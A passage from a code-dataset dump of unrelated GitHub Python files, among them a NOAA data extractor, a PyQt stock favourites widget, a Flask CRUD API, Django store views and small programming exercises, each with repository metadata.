# Parameters\r\n for v in range(0, len(duration), 1):\r\n if duration[v] <= 1:\r\n partduration.append('1P')\r\n if duration[v] > 1:\r\n partduration.append('4P')\r\n \r\n for k in range(0, len(startmin), 1):\r\n if startmin[k] < 15:\r\n quarterstart.append('1Q')\r\n if startmin[k] >= 15 and startmin[k] < 30:\r\n quarterstart.append('2Q')\r\n if startmin[k] >= 30 and startmin[k] < 45:\r\n quarterstart.append('3Q')\r\n if startmin[k] >= 45:\r\n quarterstart.append('4Q')\r\n \r\n for l in range(0, len(endmin), 1):\r\n if endmin[l] < 15:\r\n quarterend.append('1Q')\r\n if endmin[l] >= 15 and endmin[l] < 30:\r\n quarterend.append('2Q')\r\n if endmin[l] >= 30 and endmin[l] < 45:\r\n quarterend.append('3Q')\r\n if endmin[l] >= 45:\r\n quarterend.append('4Q')\r\n \r\n for n in range(0, len(frecend), 1):\r\n if frecend[n] < 100:\r\n frec.append('90-15 MHz')\r\n if frecend[n] >= 100 and frecend[n] < 200:\r\n frec.append('180-45 MHz')\r\n if frecend[n] >= 200:\r\n frec.append('525-110 MHz')\r\n \r\n for t in range(0, len(intensity), 1):\r\n for p in range(0, len(intensity[t]), 1):\r\n if intensity[t][p] == '1':\r\n relevance.append('1')\r\n if intensity[t][p] == '2':\r\n relevance.append('2')\r\n if intensity[t][p] == '3':\r\n relevance.append('3')\r\n \r\n for sec in duration:\r\n seconds.append(sec*60)\r\n \r\n \r\n # Send to Excel\r\n df = pd.read_excel(r'../Data/BurstData.xlsx')\r\n for m in range(0, len(starthour), 1):\r\n df = df.append({'From': 'NOAA',\r\n 'Station': arrayobs[m],\r\n 'Year': year,\r\n 'Month': month,\r\n 'Day': day,\r\n 'Freq Max (MHz)': frecend[m],\r\n 'Freq Min (MHz)': frecstart[m],\r\n 'Freq': frec[m],\r\n 'Hour Start': starthour[m],\r\n 'Min Start': startmin[m],\r\n 'Quarter Start': quarterstart[m],\r\n 'Duration (min)': duration[m],\r\n 'Duration (s)': seconds[m],\r\n 'Part Duration': partduration[m],\r\n 'Image Start': '-',\r\n 'Intensity (dB)': '-',\r\n 'Relevance': relevance[m]}, ignore_index=True)\r\n df.to_excel(r'../Data/BurstData.xlsx', index=False)\r\n \r\n \r\n \r\n \r\ndef read_txt(i):\r\n \r\n path = '../Data/NOAAtxt'\r\n filename = contenido[i]\r\n \r\n files = os.path.join(path, filename)\r\n return files\r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n print(\"Process finished.\")\r\n \r\n","repo_name":"AlvaroMasG/AutomatedAnalysisCallisto","sub_path":"Data_extraction/extractNOAA.py","file_name":"extractNOAA.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"25386556130","text":"import turtle\nt = turtle.Pen()\nturtle.bgcolor(\"black\")\ncolors = [\"red\", \"yellow\", \"blue\", \"green\", \"purple\",\n \"white\", \"pink\", \"gray\", \"orange\", \"brown\"]\nfamily = []\nname = turtle.textinput('My family',\n 'Enter any name or \"Stop\" to quit:')\nwhile name != \"Stop\":\n family.append(name)\n name = turtle.textinput('My family', 'Enter another name or \"Stop\" to quit:')\nfor x in range(100):\n t.pencolor(colors[x%len(family)])\n t.penup()\n t.forward(x*4)\n t.pendown()\n t.write(family[x%len(family)], font=(\"Arial\",\n int((x+4)/4), \"bold\"))\n t.left(360/len(family)+2)","repo_name":"Layren18/B.Payne-TeachYourKidsCode","sub_path":"4 глава/Spiral with names.py","file_name":"Spiral with names.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"71862852626","text":"\nimport mimetypes\nimport os.path\nfrom pyramid.response import FileResponse\nfrom pyramid.request import Request\nHERE = os.path.dirname(os.path.abspath(__file__))\n\n\nclass FrontendFilter(object):\n def 
__init__(self, app, global_conf, document_root):\n self.app = app\n if ':' in document_root:\n document_root = os.path.join(HERE, document_root.split(':', 1)[1])\n self.document_root = document_root\n\n def __call__(self, environ, start_response):\n path = environ.get('PATH_INFO').strip('/') or 'index.html'\n filename = os.path.join(self.document_root, path)\n if os.path.isfile(filename):\n file_type, _ = mimetypes.guess_type(filename)\n response = FileResponse(\n filename,\n request=Request(environ=environ),\n content_type=file_type,\n )\n return response(environ, start_response)\n return self.app(environ, start_response)\n","repo_name":"enkidulan/blog_frontend","sub_path":"blog_frontend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"4889764882","text":"# Databricks notebook source\n# MAGIC %run ../includes/configuration\n\n# COMMAND ----------\n\n# MAGIC %run ../includes/common_functions\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 1 - Read file using Spark DataFrame API\n\n# COMMAND ----------\n\nfrom pyspark.sql.types import StructType, StructField, IntegerType, StringType, DateType\n\n# COMMAND ----------\n\nname_schema = StructType([StructField('forename', StringType(), nullable=False),\\\n StructField('surname', StringType(), nullable=False)])\n\n# COMMAND ----------\n\ndriver_schema = StructType([StructField('driverId', IntegerType(), nullable=False),\\\n StructField('driverRef', StringType(), nullable=False),\\\n StructField('number', IntegerType(), nullable=True),\\\n StructField('code', StringType(), nullable=True),\\\n StructField('name', name_schema),\\\n StructField('dob', DateType(), nullable=True),\\\n StructField('nationality', StringType(), nullable=True),\\\n StructField('url', StringType(), nullable=False)])\n\n# COMMAND ----------\n\ndrivers_df = spark.read \\\n .schema(driver_schema) \\\n .json(f'{raw_folder_path}/drivers.json')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 2 - Rename & add new columns\n# MAGIC 1. rename driverId & driverRef\n# MAGIC 2. add ingestion date\n# MAGIC 3. 
concat fore and surname\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import concat, lit, col\n\nalmost_transformed_drivers_df = drivers_df.withColumnRenamed('driverId', 'driver_id') \\\n .withColumnRenamed('driverRef', 'driver_ref') \\\n .withColumn('name',concat(col('name.forename'), lit(' '), col('name.surname')))\n\n# COMMAND ----------\n\ntransformed_drivers_df = add_ingestion_date(almost_transformed_drivers_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 3 - Drop unwanted columns\n\n# COMMAND ----------\n\nfinal_drivers_df = transformed_drivers_df.drop('url')\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 4 - Write to parquet\n\n# COMMAND ----------\n\nfinal_drivers_df.write \\\n .mode('overwrite') \\\n .parquet(f'{processed_folder_path}/drivers')\n","repo_name":"M1sterDonut/Azure-Databricks-Spark-Core-For-Data-Engineers-Python-SQL-","sub_path":"formula1/ingestion/4.ingest_drivers_file.py","file_name":"4.ingest_drivers_file.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36960313333","text":"import logging\n# from datetime import datetime\n\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import QModelIndex\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QMenu, QInputDialog\nfrom PyQt5.QtWidgets import QLineEdit\n\nfrom stockmonitor.gui.dataobject import DataObject, READONLY_FAV_GROUPS\nfrom stockmonitor.gui.widget.stocktable import wallet_background_color, insert_new_action,\\\n marker_background_color\n\nfrom stockdataaccess.dataaccess.datatype import StockDataType\nfrom stockdataaccess.dataaccess.gpw.gpwcurrentdata import GpwCurrentStockData\n\nfrom .stocktable import StockTable, TableRowColorDelegate\n\nfrom .. 
import uiloader\n\n\nUiTargetClass, QtBaseClass = uiloader.load_ui_from_class_name( __file__ )\n\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass StockFavsColorDelegate( TableRowColorDelegate ):\n\n def __init__(self, dataObject: DataObject):\n super().__init__()\n self.dataObject = dataObject\n\n ## override\n def foreground(self, index: QModelIndex ):\n dataChangeIndex = GpwCurrentStockData.getColumnIndex( StockDataType.CHANGE_TO_REF )\n dataColumn = index.column()\n ## \"Zm.do k.odn.[%]\"\n if dataColumn == dataChangeIndex:\n stockChangeString = index.data()\n if stockChangeString != \"-\":\n stockChange = float(stockChangeString)\n if stockChange > 0.0:\n return QtGui.QColor( \"green\" )\n # return QtGui.QColor( \"red\" )\n return None\n\n ## override\n def background(self, index: QModelIndex ):\n sourceParent = index.parent()\n dataRow = index.row()\n dataIndex = self.parent.index( dataRow, 3, sourceParent ) ## get ticker\n ticker = dataIndex.data()\n markerColor = marker_background_color( self.dataObject, ticker )\n if markerColor is not None:\n return markerColor\n return wallet_background_color( self.dataObject, ticker )\n\n\nclass StockFavsTable( StockTable ):\n\n def __init__(self, parentWidget=None):\n super().__init__(parentWidget)\n self.setObjectName(\"stockfavstable\")\n self.setShowGrid( True )\n self.setAlternatingRowColors( False )\n self.dataObject = None\n self.favGroup = None\n\n # pylint: disable=W0221\n def connectData(self, dataObject, favGroup):\n self.dataObject = dataObject\n self.favGroup = favGroup\n if self.dataObject is None:\n return\n\n colorDecorator = StockFavsColorDelegate( self.dataObject )\n self.setColorDelegate( colorDecorator )\n\n self.dataObject.stockDataChanged.connect( self.updateData )\n self.dataObject.stockHeadersChanged.connect( self.updateView )\n self.updateData()\n self.updateView()\n\n def updateData(self):\n dataframe = self.dataObject.getFavStock( self.favGroup )\n self.setData( dataframe )\n\n def updateView(self):\n self.setHeadersText( self.dataObject.gpwCurrentHeaders )\n\n ## override\n def createContextMenu(self, itemIndex):\n contextMenu = super().createContextMenu( itemIndex )\n if self.favGroup not in READONLY_FAV_GROUPS:\n if self.dataObject is not None:\n remFavAction = insert_new_action(contextMenu, \"Remove fav\", 3)\n remFavAction.triggered.connect( self._removeFav )\n# insert_new_action(contextMenu, \"\", 1)\n return contextMenu\n\n def _removeFav(self):\n favList = self._getSelectedTickers()\n self.dataObject.deleteFav( self.favGroup, favList )\n\n def _getSelectedTickers(self):\n dataIndex = GpwCurrentStockData.getColumnIndex( StockDataType.TICKER )\n return self.getSelectedData( dataIndex ) ## ticker\n\n def settingsAccepted(self):\n self.dataObject.gpwCurrentHeaders = self.pandaModel.customHeader\n\n def settingsRejected(self):\n self.dataObject.gpwCurrentHeaders = self.pandaModel.customHeader\n\n\n## ====================================================================\n\n\nclass SinglePageWidget( QWidget ):\n\n contentChanged = pyqtSignal()\n\n def __init__(self, parentWidget=None):\n super().__init__(parentWidget)\n\n self.content = \"\"\n self.changeCounter = 0\n\n vlayout = QVBoxLayout()\n vlayout.setContentsMargins( 6, 6, 6, 6 )\n self.setLayout( vlayout )\n self.stockData = StockFavsTable(self)\n\n vlayout.addWidget( self.stockData )\n\n def setData(self, dataObject, favGroup):\n self.setObjectName( favGroup )\n self.stockData.connectData( dataObject, favGroup )\n\n def updateView(self):\n 
self.stockData.updateData()\n\n def loadSettings(self, settings):\n self.stockData.loadSettings( settings )\n\n def saveSettings(self, settings):\n self.stockData.saveSettings( settings )\n\n\nclass FavsWidget( QtBaseClass ): # type: ignore\n\n addFavGrp = pyqtSignal( str )\n renameFavGrp = pyqtSignal( str, str )\n removeFavGrp = pyqtSignal( str )\n\n def __init__(self, parentWidget=None):\n super().__init__(parentWidget)\n self.ui = UiTargetClass()\n self.ui.setupUi(self)\n\n self.dataObject = None\n\n tabBar = self.ui.data_tabs.tabBar()\n tabBar.tabMoved.connect( self.tabMoved )\n\n self.ui.data_tabs.clear()\n\n def connectData(self, dataObject):\n self.dataObject = dataObject\n self.dataObject.favsGrpChanged.connect( self.updateTab )\n self.dataObject.favsReordered.connect( self.updateOrder )\n self.dataObject.favsRenamed.connect( self._renameTab )\n self.dataObject.favsChanged.connect( self.updateView )\n self.updateView()\n\n def updateView(self):\n if self.dataObject is None:\n _LOGGER.warning(\"unable to update view\")\n self.ui.data_tabs.clear()\n return\n favsObj = self.dataObject.favs\n favKeys = favsObj.getFavGroups()\n\n _LOGGER.info(\"updating view: %s %s\", favKeys, self.tabsList() )\n\n tabsNum = self.ui.data_tabs.count()\n\n for i in reversed( range(tabsNum) ):\n tabName = self.tabText( i )\n if tabName not in favKeys:\n _LOGGER.info(\"removing tab: %s %s\", i, tabName)\n self.removeTab( i )\n\n i = -1\n for favName in favKeys:\n i += 1\n tabIndex = self.findTabIndex( favName )\n if tabIndex < 0:\n _LOGGER.debug(\"adding tab: %s\", favName)\n self.addTab( favName )\n\n self.updateOrder()\n\n def updateTab(self, tabName):\n _LOGGER.info(\"updating tab: %s\", tabName)\n tabIndex = self.findTabIndex( tabName )\n pageWidget: SinglePageWidget = self.ui.data_tabs.widget( tabIndex )\n if pageWidget is not None:\n pageWidget.updateView()\n\n def updateOrder(self):\n if self.dataObject is None:\n _LOGGER.warning(\"unable to reorder view\")\n return\n favsObj = self.dataObject.favs\n _LOGGER.info(\"updating order\")\n favKeys = favsObj.getFavGroups()\n tabBar = self.ui.data_tabs.tabBar()\n tabBar.tabMoved.disconnect( self.tabMoved )\n i = -1\n for key in favKeys:\n i += 1\n tabIndex = self.findTabIndex( key )\n if tabIndex < 0:\n continue\n if tabIndex != i:\n _LOGGER.warning(\"moving tab %s from %s to %s\", key, tabIndex, i)\n tabBar.moveTab( tabIndex, i )\n tabBar.tabMoved.connect( self.tabMoved )\n\n def addTab(self, favGroup):\n pageWidget = SinglePageWidget(self)\n pageWidget.setData( self.dataObject, favGroup )\n self.ui.data_tabs.addTab( pageWidget, favGroup )\n\n def removeTab(self, tabIndex):\n widget = self.ui.data_tabs.widget( tabIndex )\n widget.setParent( None )\n del widget\n\n def loadSettings(self, settings):\n tabsSize = self.ui.data_tabs.count()\n for tabIndex in range(0, tabsSize):\n pageWidget = self.ui.data_tabs.widget( tabIndex )\n pageWidget.loadSettings( settings )\n\n def saveSettings(self, settings):\n tabsSize = self.ui.data_tabs.count()\n for tabIndex in range(0, tabsSize):\n pageWidget = self.ui.data_tabs.widget( tabIndex )\n pageWidget.saveSettings( settings )\n\n def findTabIndex(self, tabName):\n for ind in range(0, self.ui.data_tabs.count()):\n tabText = self.tabText( ind )\n if tabText == tabName:\n return ind\n return -1\n\n def tabsList(self):\n ret = []\n for ind in range(0, self.ui.data_tabs.count()):\n tabText = self.tabText( ind )\n ret.append( tabText )\n return ret\n\n def contextMenuEvent( self, event ):\n evPos = event.pos()\n globalPos = 
self.mapToGlobal( evPos )\n tabBar = self.ui.data_tabs.tabBar()\n tabPos = tabBar.mapFromGlobal( globalPos )\n tabIndex = tabBar.tabAt( tabPos )\n\n favGroup = tabBar.tabText( tabIndex )\n if favGroup in READONLY_FAV_GROUPS:\n return\n\n contextMenu = QMenu(self)\n newAction = contextMenu.addAction(\"New\")\n renameAction = contextMenu.addAction(\"Rename\")\n deleteAction = contextMenu.addAction(\"Delete\")\n\n if tabIndex < 0:\n renameAction.setEnabled( False )\n deleteAction.setEnabled( False )\n\n action = contextMenu.exec_( globalPos )\n\n if action == newAction:\n self._newTabRequest()\n elif action == renameAction:\n self._renameTabRequest( tabIndex )\n elif action == deleteAction:\n ticker = self.tabText( tabIndex )\n self.removeFavGrp.emit( ticker )\n\n def tabMoved(self):\n favOrder = self.tabsList()\n self.dataObject.reorderFavGroups( favOrder )\n\n def _newTabRequest( self ):\n newTitle = self._requestTabName( \"Favs\" )\n if len(newTitle) < 1:\n return\n self.addFavGrp.emit( newTitle )\n\n def _renameTabRequest( self, tabIndex ):\n if tabIndex < 0:\n return\n oldTitle = self.tabText( tabIndex )\n newTitle = self._requestTabName(oldTitle)\n if not newTitle:\n # empty\n return\n self.renameFavGrp.emit( oldTitle, newTitle )\n\n def tabText(self, index):\n name = self.ui.data_tabs.tabText( index )\n name = name.replace(\"&\", \"\")\n return name\n\n def _requestTabName( self, currName ):\n newText, ok = QInputDialog.getText( self,\n \"Rename Fav Group\",\n \"Fav Group name:\",\n QLineEdit.Normal,\n currName )\n if newText in READONLY_FAV_GROUPS:\n return \"\"\n if ok and newText:\n # not empty\n return newText\n return \"\"\n\n def _renameTab(self, fromName, toName):\n tabIndex = self.findTabIndex( fromName )\n if tabIndex < 0:\n self.updateView()\n return\n tabWidget: SinglePageWidget = self.ui.data_tabs.widget( tabIndex )\n if tabWidget is None:\n self.updateView()\n return\n tabWidget.setData( self.dataObject, toName )\n tabBar = self.ui.data_tabs.tabBar()\n tabBar.setTabText( tabIndex, toName )\n","repo_name":"anetczuk/stock-monitor","sub_path":"src/stockmonitor/gui/widget/favswidget.py","file_name":"favswidget.py","file_ext":"py","file_size_in_byte":11504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"27733355175","text":"from flask import Flask, request, jsonify, make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom marshmallow import fields\nfrom marshmallow_sqlalchemy import ModelSchema\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://username:password@host:port/database-name'\ndb = SQLAlchemy(app)\n\n\n# Model\nclass User(db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(20))\n\n def create(self):\n db.session.add(self)\n db.session.commit()\n return self\n\n def __init__(self, username):\n self.username = username\n\n def __repr__(self):\n return f\"{self.id}\"\n\n\ndb.create_all()\n\n\nclass UserSchema(ModelSchema):\n class Meta(ModelSchema.Meta):\n model = User\n sqla_session = db.session\n\n id = fields.Number(dump_only=True)\n username = fields.String(required=True)\n\n\n@app.route('/api/v1/username', methods=['GET'])\ndef index():\n get_users = User.query.all()\n user_schema = UserSchema(many=True)\n users = user_schema.dump(get_users)\n return make_response(jsonify({\"list users \": users}))\n\n\n@app.route('/api/v1/username/<int:id>', methods=['GET'])\ndef get_user_by_id(id):\n get_user = 
User.query.get(id)\n user_schema = UserSchema()\n user = user_schema.dump(get_user)\n return make_response(jsonify({\"user \": user}))\n\n\n@app.route('/api/v1/username/<int:id>', methods=['PUT'])\ndef update_user_by_id(id):\n data = request.get_json()\n get_user = User.query.get(id)\n if data.get('username'):\n get_user.username = data['username']\n db.session.add(get_user)\n db.session.commit()\n user_schema = UserSchema(only=['id', 'username'])\n user = user_schema.dump(get_user)\n return make_response(jsonify({\"user \": user}))\n\n\n@app.route('/api/v1/username/<int:id>', methods=['DELETE'])\ndef delete_user_by_id(id):\n get_user = User.query.get(id)\n db.session.delete(get_user)\n db.session.commit()\n return make_response(\"\", 204)\n\n\n@app.route('/api/v1/username', methods=['POST'])\ndef create_todo():\n data = request.get_json()\n user_schema = UserSchema()\n user = user_schema.load(data)\n result = user_schema.dump(user.create())\n return make_response(jsonify({\"user \": result}), 200)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"laurohen/api-flask-mysql","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"32477710780","text":"kniha = {\n 'nazev' : 'Babicka',\n 'autori' :[\n {\n 'krestni':'Bozena',\n 'prijmeni':'Nemcova',\n 'zije':False,\n },\n {\n 'krestni':'Jara',\n 'prijmeni':'Cimrman',\n 'zije':True,\n },\n ],\n 'pocet_vytisku':100,\n }\nprint(kniha['autori'])\n\nfor autor in kniha['autori']:\n cele_jmeno= autor['krestni']+' '+autor['prijmeni']\n print(cele_jmeno)\n","repo_name":"Nadaercz/Nadazkouska2010","sub_path":"SlovnikyCviceni2.py","file_name":"SlovnikyCviceni2.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"26260787301","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'toys' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts INTEGER_ARRAY w as parameter.\n#\n\n\ndef toys(w):\n # Write your code here\n w = set(w)\n num = 0\n while len(w) > 0:\n num += 1\n m = min(w)\n w = w.difference(set(range(m, m+5)))\n return num\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input().strip())\n\n w = list(map(int, input().rstrip().split()))\n\n result = toys(w)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Seungju182/Hackerrank","sub_path":"algorithms/priyanka-and-toys.py","file_name":"priyanka-and-toys.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"38711949874","text":"# Create your views here.\nfrom django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom django.core import serializers\nfrom django.http import JsonResponse,HttpResponse\nfrom django.views import View\nfrom socials.models import *\nfrom django.db.models import Prefetch\nimport json\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n#getting data in real time\nclass AjaxPost(View):\n #handling post request\n def post(self, request):\n #getting all the images sent by the user\n images = request.FILES.getlist('images')\n images = images[0:2]\n print(images)\n #getting the text\n text = request.POST.get('text')\n print(request.user)\n #creating 
the post\n post = Post.objects.create(owner=request.user,content=text,title=text[0:5])\n for image in images:\n PostImage.objects.create(post=post, image=image)\n messages.success(request, 'created successfully')\n return JsonResponse({'content': 'post created successfully'}, status=200)\n\n\n\nclass ProductView(View):\n def post(self, request):\n images = request.FILES.getlist('images')\n three_images = images[0:3]\n image = images[0]\n details = request.POST.get('text')\n price = request.POST.get('price')\n title = request.POST.get('name')\n\n post = Post.objects.create(title=title,\n owner=request.user,\n content=details)\n\n #use a separate loop variable so 'image' keeps the first upload for the product\n for img in three_images:\n PostImage.objects.create(post=post, image=img)\n\n product = Product.objects.create(merchant=request.user,\n title=title,\n price=price,\n image=image,\n details=details,\n post=post)\n\n return redirect('market')\n\n def get(self,request):\n products = Product.objects.all()\n context = {\n 'products': products\n }\n return render(request,'socials/marketplace.html',context)\n\n\n\n \n\n\nclass LivePost(View):\n def post(self, request):\n data = json.loads(request.body)\n print(data)\n return JsonResponse({'content': 'done'})\n\nclass ImagePost(View):\n def get(self, request):\n images = PostImage.objects.all()\n return JsonResponse({'images':list(images.values())})\n\n#handling the pagination for the javascripts with my own pagination algorithm\ndef pagination_handler():\n posts = Post.objects.all()\n paginated_post = []\n while len(posts) !=0:\n paginated_post.append(posts[0:4])\n posts = posts[4:]\n print(paginated_post)\n return paginated_post\n\ndef check(request):\n page = request.session.get('page')\n return page\n\n\n# def PostView(request):\n# posts = Post.objects.all()\n# context = {\n# 'posts' : posts\n# }\n# if request.method == 'POST':\n# data = json.loads(request.body)\n# print(data)\n# return render(request,'socials/home.html',context)\n\n\n\n\n\nclass PostView(View):\n def get(self, request):\n print(request.user.id)\n posts = Post.objects.all()\n context = {\n 'posts' : posts\n }\n return render(request, 'socials/home.html',context)\n \n def post(self, request):\n posts = Post.objects.all()\n try:\n data = json.loads(request.body)\n id = data.get('id')\n text = data.get('text')\n post = Post.objects.get(id=id)\n comment = Comment.objects.create(post=post, \n owner=request.user,\n comment=text)\n comment.save()\n context = {\n 'posts' : posts\n }\n except:\n context = {\n 'posts' : posts\n }\n return redirect('home')\n \n \n\n \n \n \n \n\n\n\nclass IncrementLikeView(View):\n #handling post request for the like views\n def post(self, request):\n #converting the request.body from bytes to python native data types\n data = json.loads(request.body)\n post_id = data.get('id')\n post = Post.objects.get(id=post_id)\n try:\n like = Like.objects.get(post=post, user=request.user)\n if like:\n post.likes -= 1\n like.delete()\n post.save()\n except:\n like = Like.objects.create(post=post, user=request.user)\n post.likes += 1\n post.save()\n return JsonResponse({'content': 'like added successfully','likes': post.likes}, status=200)\n\n\n\ndef postdetails(request,pk):\n post = Post.objects.get(id=pk)\n post_images = post.post_images.all()\n first_image = post_images[0].image.url\n comments = Comment.objects.filter(post=post.id)\n if request.method == 'POST':\n text = request.POST.get('text')\n comment = Comment.objects.create(owner=request.user, post=post, comment=text)\n context = {\n 'first_image': first_image,\n 'post_images': 
post_images,\n 'post': post,\n 'comments' : comments,\n }\n return render(request, 'socials/post_detail.html',context)\n\n\ndef Productdetails(request,pk):\n product = Product.objects.get(id=pk)\n context = {\n 'product': product\n }\n\n return render(request, 'socials/productdetail.html',context)\n\n\n\n\n\n\ndef uploadproduct(request):\n pass\n\ndef store(request, pk):\n return render(request, 'socials/store.html')\n\ndef chat(request):\n chats = Chat.objects.filter(owner=request.user)\n context = {\n 'chats': chats\n }\n return render(request,'socials/chat.html',context)\n\n\ndef chatdetail(request,pk):\n print(request.user)\n chat = Chat.objects.get(owner=request.user, receiver=pk)\n context = {\n 'chat': chat\n }\n return render(request, 'socials/chatdetail.html',context)","repo_name":"MictovicDev/UniportMall","sub_path":"socials/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"31080460155","text":"class Solution:\n def minSubArrayLen(self, target: int, nums: List[int]) -> int:\n # [2,3,1,2,4,3] k = 7\n # |2|X |2,3|X |2,3,1|X |2,3,1,2| yes -> decrease the window\n # |3,1,2|X |3,1,2,4|yes |1,2,4|yes |2,4|nope |2,4,3| |4,3|\n \n \n total = 0\n count = len(nums)+1\n l,r = 0,0\n \n while l<=r and r<len(nums):\n total+=nums[r]\n if total>=target:\n while l<=r and total>=target:\n count = min(count,r-l+1)\n if count==1:\n return 1\n total-=nums[l]\n l+=1\n \n r+=1\n \n return 0 if count==len(nums)+1 else count\n ","repo_name":"Merwan-J/competetive-programming","sub_path":"209-minimum-size-subarray-sum/209-minimum-size-subarray-sum.py","file_name":"209-minimum-size-subarray-sum.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"5686026327","text":"def fib(n):\r\n # Base step\r\n if n == 0:\r\n return 0\r\n # Base step\r\n if n == 1:\r\n return 1\r\n # Recursive step\r\n if n >=2: \r\n return (fib(n - 1) + fib(n - 2))\r\n\r\n\r\nfor i in range(5+1):\r\n print(f\"fibonacci({i}) = {fib(i)}\")\r\n\r\n# fibonacci(0) = 0\r\n# fibonacci(1) = 1\r\n# fibonacci(2) = 1\r\n# fibonacci(3) = 2\r\n# fibonacci(4) = 3\r\n# fibonacci(5) = 5","repo_name":"AndreasSoularidis/medium_articles","sub_path":"Recursion/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"}{"seq_id":"19981404632","text":"#!/usr/bin/python3\ndef fizzbuzz():\n i = 1\n while i <= 100:\n if i % 3 == 0:\n print('Fizz', end='')\n if i % 5 == 0:\n print('Buzz', end='')\n if i % 3 != 0 and i % 5 != 0:\n print('{:d}'.format(i), end='')\n print(\" \", end='')\n i = i + 1\n","repo_name":"humtej1204/holbertonschool-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/12-fizzbuzz.py","file_name":"12-fizzbuzz.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"}{"seq_id":"69911456145","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.template import RequestContext, loader\nfrom django.core.urlresolvers import reverse\nfrom store.models import Item, Item_Qty, Size, User, Cart\nfrom django.contrib import messages\n\nDANGER = 50\n\ndef index(request):\n\t\titem_list = Item.objects.all()\n\t\tcontext = { 'items' : item_list 
}\n\t\treturn render(request, 'store/item.html', context)\n\ndef detail(request, item_id):\n\ttry:\n\t\t\tprofile = Item.objects.get(pk = item_id)\n\texcept Item.DoesNotExist:\n\t\traise Http404\n\toptions = Size.objects.all()\n\tfor o in options:\n\t\titem = Item_Qty.objects.filter(profile_id = item_id, size = o.id)\n\t\tif not item:\n\t\t\to.stat = 'disabled=\"disabled\"'\n\t\telse:\n\t\t\to.stat = ''\n\treturn render(request, 'store/item.html', {'profile' : profile, 'options' : options})\n\ndef add(request, item_id):\n\t\ti = get_object_or_404(Item, pk = item_id)\n\t\ttry:\n\t\t\titem = Item_Qty.objects.get(profile_id = item_id, size = request.POST['size'])\n\t\t\titem.quantity -= 1\n\t\t\titem.pending += 1\n\t\t\ttry:\n\t\t\t\tcheck = Cart.objects.get(item = item.id)\n\t\t\t\tcheck.qty +=1\n\t\t\t\tcheck.save()\n\t\t\texcept Cart.DoesNotExist:\n\t\t\t\tc = Cart(item = item.id, qty = 1)\n\t\t\t\tc.save()\n\t\t\titem.save()\n\t\t\tmessages.success(request, 'Item was added to your cart.')\n\t\texcept (KeyError, Item_Qty.DoesNotExist):\n\t\t\tmessages.warning(request, 'That item does not exist.')\n\t\treturn HttpResponseRedirect(reverse('store:index'))\n\ndef cart(request):\n\ttotal = 0\n\tsubtotal = 0\n\titems = Cart.objects.all()\n\tfor i in items:\n\t\tnum = []\n\t\tcount = 1\n\t\tinfo = Item_Qty.objects.get(id = i.item)\n\t\tnumber = info.quantity\n\t\tsize = Size.objects.get(id = info.size_id)\n\t\ti.size = size.size\n\t\tmore = Item.objects.get(id = info.profile_id)\n\t\ti.title = more.title\n\t\ti.price = more.price\n\t\ti.total = int(more.price) * int(i.qty)\n\t\tsubtotal += i.total\n\ttotal = subtotal + 10\n\treturn render(request, 'store/cart.html', {'items' : items, 'total' : total, 'subtotal' : subtotal})\n\n\ndef remove(request, item_id):\n\tqty = 0\n\titem = Cart.objects.get(item = item_id)\n\tqty = item.qty\n\tprofile = Item_Qty.objects.get(id = item_id)\n\tprofile.quantity += qty\n\tprofile.pending -= 